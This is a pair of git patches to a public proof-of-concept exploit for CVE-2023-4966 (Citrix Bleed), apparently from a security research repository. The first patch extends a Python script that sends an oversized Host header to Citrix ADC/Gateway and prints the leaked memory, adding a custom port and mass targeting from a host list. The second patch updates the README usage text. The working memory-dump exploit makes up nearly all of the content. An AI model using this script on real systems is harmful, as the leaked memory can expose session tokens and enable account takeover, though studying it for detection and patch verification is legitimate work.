From 75e6edfd9004ad387252f4991c28f27590b9d08d Mon Sep 17 00:00:00 2001
From: Andy Gill <ZephrFish@users.noreply.github.com>
Date: Tue, 7 Nov 2023 17:20:01 +0000
Subject: [PATCH 1/2] added custom port and ability to supply a list of hosts
 and custom port

---
 citrix/CVE-2023-4966/exploit.py | 28 ++++++++++++++++++++--------
 1 file changed, 20 insertions(+), 8 deletions(-)

diff --git a/citrix/CVE-2023-4966/exploit.py b/citrix/CVE-2023-4966/exploit.py
index 8105c3a..e8dc3e2 100755
--- a/citrix/CVE-2023-4966/exploit.py
+++ b/citrix/CVE-2023-4966/exploit.py
@@ -8,22 +8,34 @@
 
 parser = argparse.ArgumentParser()
 parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
+parser.add_argument("-p", "--port", help = "Target port", default = 443)
+parser.add_argument('--file', help='Path to a text file containing a list of hosts, one per line')
 args = parser.parse_args()
 
-if args.target is None:
-    print('Target must be provided (e.g. --target 192.168.1.200)')
+if args.target is None and args.file is None:
+    print('Either a target or a file containing hosts must be provided (e.g., --target 192.168.1.200 or --file hosts.txt)')
     sys.exit(0)
 
-hostname = args.target
-
-if __name__ == "__main__":
+def test_host(hostname, port):
     headers = {
         "Host": "a"*24576
     }
-    r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
+    r = requests.get(f"https://{hostname}:{port}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False, timeout=10)
     if r.status_code == 200:
-        print("--- Dumped Memory ---")
+        print(f"--- Dumped Memory for {hostname}:{port} ---")
         print(r.text[131050:])
         print("---      End      ---")
     else:
-        print("Could not dump memory")
+        print(f"Could not dump memory for {hostname}:{port}")
+
+if args.target:
+    hostname = args.target
+    port = int(args.port)
+    test_host(hostname, port)
+
+if args.file:
+    with open(args.file, 'r') as file:
+        for line in file:
+            hostname = line.strip()
+            port = int(args.port)
+            test_host(hostname, port)

From 19ac3902e3b434e5a23d0f71e297a76131c4481b Mon Sep 17 00:00:00 2001
From: Andy Gill <ZephrFish@users.noreply.github.com>
Date: Tue, 7 Nov 2023 17:21:45 +0000
Subject: [PATCH 2/2] added additional options

---
 citrix/CVE-2023-4966/README.md | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/citrix/CVE-2023-4966/README.md b/citrix/CVE-2023-4966/README.md
index 8691b55..9198553 100644
--- a/citrix/CVE-2023-4966/README.md
+++ b/citrix/CVE-2023-4966/README.md
@@ -7,9 +7,11 @@ Read more at our blog: [https://www.assetnote.io/resources/research/citrix-bleed
 # Usage:
 
 ```
-usage: exploit.py [-h] [--target TARGET]
+usage: exploit.py [-h] [--target TARGET] [--port PORT] [--file FILE]
 
 optional arguments:
-  -h, --help       show this help message and exit
-  --target TARGET  The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
+  -h, --help            show this help message and exit
+  --target TARGET       The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
+  -p PORT, --port PORT  Default target port
+  --file FILE           Path to a text file containing a list of hosts, one per line
 ```